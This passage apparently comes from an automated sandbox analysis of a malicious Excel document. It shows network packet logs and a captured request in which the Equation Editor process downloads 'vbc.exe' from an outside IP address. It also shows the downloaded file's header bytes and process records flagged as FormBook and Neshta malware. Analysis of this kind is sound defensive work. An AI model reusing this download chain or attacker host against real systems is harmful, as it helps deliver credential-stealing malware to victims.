          Oct 27, 2021 16:33:30.048923016 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048927069 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048933029 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048949957 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048964977 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.048979044 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.048990011 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.049005985 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.049014091 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.049082994 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162086964 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162128925 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162151098 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162168980 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162185907 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162206888 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162230968 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162256956 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162280083 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162305117 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162311077 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162328959 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162343979 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162353992 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162368059 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162375927 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162390947 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162401915 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162409067 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162425995 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.162434101 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.162465096 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.165993929 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275465965 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275494099 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275515079 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275537014 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275557995 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275578976 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275619030 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275639057 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275660038 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275681019 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275701046 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275722980 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275743008 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275763035 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275768995 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275784969 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275805950 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275826931 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275842905 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275849104 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275871038 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275875092 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275891066 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275908947 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275913000 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275933981 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275940895 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275955915 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275976896 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.275985003 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.275998116 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276010990 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276019096 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276038885 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276041985 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276060104 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276070118 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276081085 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276101112 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276104927 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276120901 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276135921 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276143074 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.276166916 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.276194096 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.278616905 CEST  49167        80         192.168.2.22    192.227.228.38
          Oct 27, 2021 16:33:30.389725924 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.389767885 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.389791012 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.389812946 CEST  80           49167      192.227.228.38  192.168.2.22
          Oct 27, 2021 16:33:30.389834881 CEST  80           49167      192.227.228.38  192.168.2.22

          HTTP Request Dependency Graph

          • 192.227.228.38

          HTTP Packets

          Session ID: 0
          Source IP: 192.168.2.22
          Source Port: 49167
          Destination IP: 192.227.228.38
          Destination Port: 80
          Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Timestamp                             kBytes transferred  Direction  Data
          Oct 27, 2021 16:33:29.820317984 CEST  0                   OUT        GET /0078/vbc.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 192.227.228.38
          Connection: Keep-Alive
          Oct 27, 2021 16:33:29.934331894 CEST  1                   IN         HTTP/1.1 200 OK
          Date: Thu, 28 Oct 2021 11:38:05 GMT
          Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
          Last-Modified: Wed, 27 Oct 2021 06:07:30 GMT
          ETag: "39809-5cf4f68c9b908"
          Accept-Ranges: bytes
          Content-Length: 235529
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdownload
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@tp|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@


          Code Manipulations

          Statistics

          Behavior


          System Behavior

          General

          Start time: 16:32:21
          Start date: 27/10/2021
          Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit): false
          Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase: 0x13f0f0000
          File size: 28253536 bytes
          MD5 hash: D53B85E21886D2AF9815C377537BCAC3
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Reputation: high

          General

          Start time: 16:32:44
          Start date: 27/10/2021
          Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit): true
          Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Imagebase: 0x400000
          File size: 543304 bytes
          MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Reputation: high

          General

          Start time: 16:32:47
          Start date: 27/10/2021
          Path: C:\Users\Public\vbc.exe
          Wow64 process (32bit): true
          Commandline: 'C:\Users\Public\vbc.exe'
          Imagebase: 0x400000
          File size: 235529 bytes
          MD5 hash: DF330AB2A2E5AA4AC947315EE3F93992
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, Author: Florian Roth
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          Reputation: low

          General

          Start time: 16:32:49
          Start date: 27/10/2021
          Path: C:\Users\Public\vbc.exe
          Wow64 process (32bit): true
          Commandline: 'C:\Users\Public\vbc.exe'
          Imagebase: 0x400000
          File size: 235529 bytes
          MD5 hash: DF330AB2A2E5AA4AC947315EE3F93992
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Yara matches:
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          Reputation: low

          Disassembly

          Code Analysis
